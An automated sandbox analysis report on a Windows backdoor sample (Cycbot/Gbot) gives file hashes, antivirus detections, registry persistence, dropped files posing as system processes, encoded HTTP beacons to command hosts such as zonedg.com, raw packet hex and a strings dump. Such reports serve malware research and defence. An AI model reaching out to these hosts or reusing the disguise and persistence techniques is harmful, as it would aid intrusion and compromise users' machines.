Analysis Date2014-10-14 23:37:44
MD555bb46dabc1cecd98ac357102394b79f
SHA1d9e837626951ddf46acecae2118f378a2e882d1e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5b1b41ca1ef9e6d49ea06a17628e223a sha1: 026225663ac5177334ad559563c79d98adfb9c43 size: 105984
Section.rdata md5: b1d07d72ec73f0a603eeea2993b219bc sha1: 200fdea7c0fe4a4a79173fb04cfbcbf317e4adf5 size: 1536
Section.data md5: 6bab8c7446cbdfa20c19b46b33d49762 sha1: 4996a6bee3152d376f088b78c2692a69ac713818 size: 87552
Section.reloc md5: 1f2899f3aa04df77a0346deced94237a sha1: 499b7ca0c4ec5125141c00d7864128b26cbed0d6 size: 1024
Timestamp2005-09-14 21:53:33
PEhashcd2b1b534c72007e1bd594ed73b21b0f810cd661
IMPhash443f171adf78102839491b6270071b07
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/FraudSecurity.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-643
AVDr. WebTrojan.DownLoader5.1167
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TQJ
AVFortinetW32/FakeAV.ISS!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Heur.Conjar.5
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.s
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwin32/Cycbot.EH
AVRisingTrojan.Win32.Generic.12A42007
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot
AVYara APTno_virus
AVZillya!Backdoor.Gbot.Win32.3504

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\lvvm.exe
Creates FileC:\WINDOWS\system32\lvvm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\conhost.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSgravatar.com
Winsock DNSyourmediaspace.com
Winsock DNSonlinehelptoall.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\conhost.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\conhost.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.239
DNSgravatar.com
Type: A
192.0.80.240
DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSonlinehelptoall.com
Type: A
DNSyourmediaspace.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v96=17&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 192.0.80.239:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763936   bcfe64067be2?v96
0x00000040 (00064)   3d313726 74713d67 485a7574 44794d76   =17&tq=gHZutDyMv
0x00000050 (00080)   35724a65 54666961 396e726d 736c3667   5rJeTfia9nrmsl6g
0x00000060 (00096)   69577a25 32424a5a 62567941 25334420   iWz%2BJZbVyA%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a2067 72617661 7461722e 636f6d0d   t: gravatar.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53765425   ij%2B8yjYvEaSvT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
{..
$o?W.
;
.
....
.
...
.
080904b0
1.0.0.1
1915
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^^^^
~~~~~~~~~
<<<<<<<<
<<<<<<<<<<
<<<<<<<<<<<<
=========
|||||||
||||||||||
      
         
,,,,,,,
,,,,,,,,|||
,,,,,,,,,,,,,,,,
;;;;;;;;;;;;;
!!!!!!
!!!!!!!!!!
!!!!!!				
??????
???????
??????????????
.______________________
..........
''''''''''''
"""""""""
"""""""""""""
((((((((((((
)=^-_(
{{{{{{{
*******
********
*********
&&<<<<<'
&&&&&&&&
&&&&&&&&&&&####
#|]{	]
#######
%%%%%%%%%
+++++++
++++++++
+++++++++++++++++
++				
						
011111
04w:9W
0B`VS%
0M8{:y
~|0Rv)
1111111gggggggggg
(1E861e)
//1jhF
1o~_yA
1sz?F\
1;XEmK
22@@@@@@@eee
+)[	27
27^ngX{m
2d++re
`2|{#n
2sVMt 
<2uBL?Z
2u:Du)
33333333333
))333333333333lllllll
36`$'-
3>'LrV%
3RRv.v
44444444444444444
4?a95:J7
4%I!z8!
51_NJ/
,,55555
555555
555555555555
5(Bq/F:
"5fBlS
/5=z_}
666666>
66666666
6666666666
6666666MMM
6qfee|	
777777
,,,,77777mmmmmmmmmmmmmmnnn
$|||7E
7mVmNt7#n
{	7n?k
7~+|q7
7WTm!G=
888888
8888888
88;b?7
8(fYTW
8hffq_
8lqPDcM[
8[m]n!D|
:8s1!&
!8Wq%"
'8/x?l
;	8Y2A
_91*gLX
&999```
9999999
99999999
99999iiiii
9AAAAAAAAhhhh
%?/9xq
#a7[Q	
[A7q1q2j
AAAA%%%%%%%%
aaaaaaaaaaaaaaaa
>aad=r
_a:AMB
ac]x|`
ADVAPI32.dll
.Ail!">
^a&&-M
amshg('G{q
.a'_S0
aT*0GOE
baaaaaa
$bbbbb
###bbbbbbbbbbbb
:BDoi:R
B>vp;3.
?B)W0,
BYO~mX
ByZ\]BJ
~c4ZzN
c6Ut@~
c8888888
CCCCCC
CCCCCCCCCCCC
*********ccccccccccYYY
CG/'J*)
cIhcs.d
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
C|]OLZ
CreateProcessW
CreateStdAccessibleObject
CTA[x`
@d| ,(
@.data
>>>>>DD
dddddd
DDDDDD
DDDDDDDD
*****DDDDDDDD
DDDDDDDDDDDDDDDDDbb
DDDDDDDDDDDDDDDDy
d_h8Ml
E7od5p
E&.9LA
|@'EA*
|||EEE
eeeeee
Ei]s_4
EI'$-Zp
En?:@NO
EnumResourceNamesA
[eNXnu"&@
ep_m0B
EvNv]UH(
-ew0Z[
F	6gh`,k
FC5Dkn
Fd>_l[Ec
\FFFFFFFFFFF
FFFj..
ff,,,,,,,,,,,,,,,,,,,,MMMMMMMMMM
FK16T-h
f	q:kj
[fv5/=
fvd%;a
g53,BtIA
G,9?N?n
.*Gd]"
GetACP
GetAtomNameW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentVariableW
GetLocaleInfoW
GetModuleHandleW
GetStartupInfoW
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
gggggg
ggggggg
gggggggggggggg
Gh385	
g~}/l3
-"G)/P
#GU{b	
GwGCW!	
gWHcxv
gxn$<1>QQ
H8888888888
h`b%z#opi
]HDTLK
HFd!dt
hhhhh9999999888
hhhhhhhhh
	}Hp."
<h,y?'j
"I6aB<+tQ
IBD:I\
"iEdX,C
i^=H;mN
....ii
IIIIIIIII!!!!
iiiikkkk
IIXXXX
InstallCatalog
InterlockedCompareExchange
InterlockedExchange
|||||||||||IQQQQQQQQQQQQ<<<<<
IsDebuggerPresent
I*TBQ5{
j         
j	\\\\\\\
j2AAAAAAP
JJJ___
JJJJJJ
jjjjjjjjj
jjjjjjPPPPPPP
JJJJJJ^^^^^^^^uuuuuuuuuu
%jou:[
JpN=LS
$`"jPz
;jQOCo
Jw#6AL
?	J%wF
)))))))K
[k0R7J
K3"c~<.
!K	e/H
KERNEL32.dll
KKKKccc
//~~~~~~~~~~~kkkkk
KKKKKKKK##
kkkkkkkkkkkk
kkkkkkkkkkkkkk
{{{KKKK///m
KKKWW"""""""
%K-mM>
`k]qdr
kRl~UP^F
Ktjhb(
kvi<Ka
Kzjp#Eh
|KZnPp
%"kZ^u
%KZx1c
@L0-""
L2S-RN7
"Lbo:a
L	B*+zw
~L;dEW
L^kaK_S
llll''''''
lllllllll
LLLLLLLLLLLLLh
llllllllllllllls
LocalAlloc
lP^!_0T
L_R=):
LresultFromObject
LR%yxH
lstrlenA
lstrlenW
lVbpSO9
lw*{]HCAe5
M2gK\}
mciSendCommandA
^MGaR7a	
M gQ0U6=
MG)U)B~
miD'v<
mmmmmmmmmmmmm
MS	zA$
MultiByteToWideChar
muW}''~
mybdh[4A
n2*1m-
N;66J!1
	/N$7d3
nAD5<;
=NB;'c
NC+dnH
NF_irp
:)nL3Sw
nnnnnn
nnnnnnnnnn
noMFHc
o6s]cA
oD%O""
OLEACC
[{oN2e
oooo\\\\\
//ooooo
oooooo
ooooooo!hhhhhhhhhhhh
ooooooooo
OOOOOOOOO
ooooooooooo
oSnEQQ?~
O?X3vT57
O[|y7o
OZha4|
<!"p5S/
PathAddBackslashA
pBq'+_
pDTEx1
pP$dT4
PPPPPBBBB
PPPPPPP
PPPPPPPPPPPPP
pwZb<o
q	CQ{4
QdL)K80
Q~HE5Q'
qJJJJJJJJJJJJJJJJJJJJJ
qL.>".
-'qor(P
QP]=.]qz
qqqqq!
QQQQQQ
qqqqqqqqq
QQQQQY
QueryPerformanceCounter
Q^wF.D
q*WzU4l
RaiseException
rA;+xB
`.rdata
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
R*f!qW
*RMP0x
RRRRRRR
rrrrrrrBBB
:R`t|IR
RwxI1'
S&>1FV
+`S-6R
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
|!s'hl
SHLWAPI.dll
Sjj{KS
<+)]slIT
sndPlaySoundA
SoHuW.x
__SS>W
sxCP"Y
s&"zS+
	=T0{,
t-2ilU+
<TcR5W
tE>iG^y
TerminateProcess
TF|\I;
!This program cannot be run in DOS mode.
^@TiT##W]
TS?4xNn
ttttttt
tU0~^;
&:tXJt
:tZ;D\
TzSpecificLocalTimeToSystemTime
u=!@*_
	:u5^'
@U5 NT
+/u&8m
u.9~-+[
uaj|\T
uB7!uwa
U@:Crr
-/uf6DY	
>UL$&aV
UnhandledExceptionFilter
]UoA+w
+U(=PZ
;US:+d^
U/sn-}W
U!&-;tnQ
UtZj/r
u?]U-m
!!!!!!!!!!!uuuuuuu
UUUUUUUUUU
^^UUUZ
V1p<ch
v1UwrM
V=6hg[D
vd9nR$
:@#VDa
vmIC?K
#V) N%
]?Vnm(
vnnnnnnnn
vRJfR|
^v#SXl
}!VvTKq
////////VVVV
**VVVV
VVVVVV
vvvvvvvv
vvvvvvvvvvvvvvv
v=z5>;
Vzb=ck
}w8Lm$s
WideCharToMultiByte
WINMM.dll
wwwwwww
'WZ"{t
X]FdJO
%XR'(2JV
]xS@%j
xxxxxx
XZ|BU8
'y]0;9.
Y}jp;n
y;O`ax
yq {CC
))yyeeeeeee
						YYYY
yyyyyy
YYYYYY
yZZZZZ
^z;;/A|
zk-	N)-
^ZSjM#
Z`}Tt6kn
zw4Q>\+2A L-
zXAk1'
Z}yRg*u
'ZzVt\,
ZZZZZZZZWWWWWWWW
ZZZZZZZZZZZZZZ